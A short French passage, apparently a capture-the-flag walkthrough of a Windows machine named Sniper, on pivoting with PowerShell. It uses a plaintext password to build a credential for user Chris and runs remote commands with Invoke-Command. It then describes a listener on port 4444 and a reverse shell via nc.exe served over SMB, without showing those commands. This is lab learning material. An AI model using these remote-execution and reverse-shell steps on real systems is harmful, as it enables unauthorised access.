Pivoting Windows (PowerShell)
PowerShell
Nous avons lancé PowerShell sur notre machine d'attaque :
powershellNous avons récupéré le nom de l'environnement Windows avec la commande hostname, et avons constaté que le nom d'hôte était Sniper.
hostnameEnsuite, nous avons créé une variable pour l'utilisateur Chris et une autre pour le mot de passe en utilisant ConvertTo-SecureString :
$user = "Sniper\Chris"$password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -ForcePuis, nous avons créé un objet PSCredential pour pouvoir exécuter des commandes à distance sur la machine cible :
$cred = New-Object System.Management.Automation.PSCredential($user, $password)Exécution de commandes à distance :
Nous avons utilisé la commande suivante pour exécuter whoami à distance et valider l'accès :
Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock {whoami}Cela nous a permis de confirmer que nous étions bien connectés en tant que Chris.

Reverse shell : Pour obtenir un accès complet au système, nous avons mis en place un listener sur le port 4444 :
Ensuite, nous avons exécuté un reverse shell en utilisant nc.exe depuis notre serveur SMB :

Mis à jour
Ce contenu vous a-t-il été utile ?